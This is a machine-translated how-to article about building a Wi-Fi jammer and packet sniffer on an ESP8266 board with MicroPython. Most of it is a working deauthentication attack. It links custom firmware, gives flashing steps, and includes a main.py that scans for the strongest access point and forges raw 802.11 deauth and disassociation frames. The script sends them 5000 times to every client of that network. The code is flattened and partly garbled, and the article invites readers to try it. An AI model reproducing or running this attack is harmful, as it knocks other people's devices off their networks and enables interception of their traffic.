Shulou(Shulou.com)06/02 Report--

This article mainly introduces "MicroPython how to achieve wifi interference and packet capture", in daily operation, I believe many people in MicroPython how to achieve wifi interference and packet capture problems have doubts, Xiaobian consulted all kinds of information, sorted out simple and easy to use operation methods, I hope to answer "MicroPython how to achieve wifi interference and packet capture" doubts helpful! Next, please follow the small series to learn together!

0x01 Implementation Principle

a) By consulting the data and analyzing the source code of arduino, we know that the attack is actually to send IEEE802.11 protocol deauthentication packet and send self-defined false deautch packet according to MAC layer frame format.

b) Call wifi_send_pkt_freedom function in ESP8266SDK to send attack packet.

0x02 Attack Concept

a) The AP of the attachment is scanned at the beginning of the procedure.

b) Find the AP with the strongest signal and obtain its MAC address (bssid) and channel.

c) Switch TPYBoardv202 to the same channel as the attacking AP.

d) Using the MAC address of the attacking AP, send a deauth packet in combination.

0x03 Compile and burn firmware and program source code

1. Compile firmware

In the existing micropython-esp8266 firmware, there is no wifi_send_pkt_freedom function, so

I compiled the firmware myself, address:

https://github.com/PakchoiFood/micropython-deauth

You can download and write it yourself. If some friends want to compile and modify the firmware themselves, please refer to:

https://github.com/micropython/micropython/tree/master/esp8266

Note: When compiling esp8266-sdk, note that the version must be version 1.3.0, otherwise the wifi_send_pkt_freedom function will always return-1 failure.

After downloading and extracting, the file is as follows:

firmware.bin file: firmware generated by micropython-esp8266.

Added:

setAttack function

Parameter: int Type (channel)

Function: Set ESP8266 channel

send_pkt_freedom function

Parameters: bytes array (defined packets)

flash_download_tools_v3.3.6_win.rar: Tool for burning firmware.

MicroPython FileUploader.rar: Tool for downloading programs to TPYBoardv202Flash.

main.py file: program source code file, mainly to achieve the attachment AP scanning, packet combination and call sent.

import timeimport uosimport wirelesssta_if=wireless.attack(0)#0: STA mode sta_if.active(True)ap_list=sta_if.scan()print(ap_list)ssid=''bssid=''#bssid:AP MAC addresschannel=''#channel_client=[0xFF, 0xFF]#tacit def deauth(_ap,_client,type,reason): # 0 - 1 type, subtype c0: deauth (a0: disassociate) # 2 - 3 duration (SDK takes care of that) # 4 - 9 reciever (target) # 10 - 15 source (ap) # 16 - 21 BSSID (ap) # 22 - 23 fragment & squence number # 24 - 25 reason code (1 = unspecified reason) packet=bytearray([0xC0,0x00,0x00,0x00,0xBB,0xBB,0xBB,0xBB,0xBB,0xBB,0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,0x00, 0x00,0x01, 0x00]) for i in range(0,6): packet[4 + i] =_client[i] packet[10 + i] = packet[16 + i] =_ap[i] #set type packet[0] = type; packet[24] = reason result=sta_if.send_pkt_freedom(packet) if result==0: time.sleep_ms(1) return True else: return False if __name__=="__main__": max_rssid=0 max_id=0 num=0 #Get the AP with the strongest signal to attack for i in ap_list: if max_rssid==0: max_rssid=i[3]#rssid else: if i[3]>max_rssid: max_rssid=i[3] max_id=num num+=1 ssid=ap_list[max_id][0] bssid=ap_list[max_id][1] channel=ap_list[max_id][2] print('ssid:',ssid,'-bssid:',bssid) print('-channel:',channel,'-rssid:',max_rssid) sendNum=5000#Number of attacks print('******************************') if sta_if.setAttack(channel): print('Set Attack OK') time.sleep_ms(100) print('---deauth runing-----') for i in range(0,sendNum): r_=deauth(bssid, _client, 0xC0, 0x01) if r_: deauth(bssid, _client, 0xA0, 0x01) deauth(_client, bssid, 0xC0, 0x01) deauth(_client, bssid, 0xA0, 0x01) time.sleep_ms(5) else: print('---deauth fail-------') time.sleep_ms(5000)

Main.py under the sniffer folder implements the network packet capture function.

import wirelessport time#can specify channels 1~13sniffer=wireless.sniffer(6)#0: indicates to switch channels from channel 1 #sniffer=wireless.sniffer(0)

burn firmware

1. TPYBoardv202 uses microUSB data cable to connect to computer. Check the ports of the usb converter installed. Open your computer's Device Manager (COM57 here).

2. Unzip flash_download_tools_v3.3.6_win.rar, double-click to run ESPFlashDownloadTool_v3.3.6.exe.

3. Select firmware.bin firmware file, address 0x00000, and set other parameters according to the following figure. My COM selects COM57, according to their actual port selection, baud rate selection 115200.

4. Click [START], and the interface prompts waiting for power-on synchronization. Press and hold the FLASH key on the board firmly, and press RST key to reset the power-on. The blank area on the left shows the MAC address read, and the status shows downloading. At this time, release the key.

5. Wait for the download to complete and close the software to exit.

download program

Unzip MicroPythonFileUploader.rar and double-click to run MicroPythonFileUploader.exe.

This software requires. NET Framework 4.2 and above. If it fails to open, please install. NET Framework before using it.

. NET Framework 4.5 download address: http://www.tpyboard.com/download/drive/174.html

7. Select COM57 and click [Open] to open the serial port.

8. Click the folder icon button on the right and select the main.py file.

9. Click Send to send the program to TPYBoardv202. After successful transmission, the program runs automatically.

10. Next download main.py under sniffer to the board in the same way. (The document will be overwritten)

Open serial assistant, you can see esp8266 capture packet data.

At this point, the study of "MicroPython how to achieve wifi interference and packet capture" is over, hoping to solve everyone's doubts. Theory and practice can better match to help everyone learn, go and try it! If you want to continue learning more relevant knowledge, please continue to pay attention to the website, Xiaobian will continue to strive to bring more practical articles for everyone!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.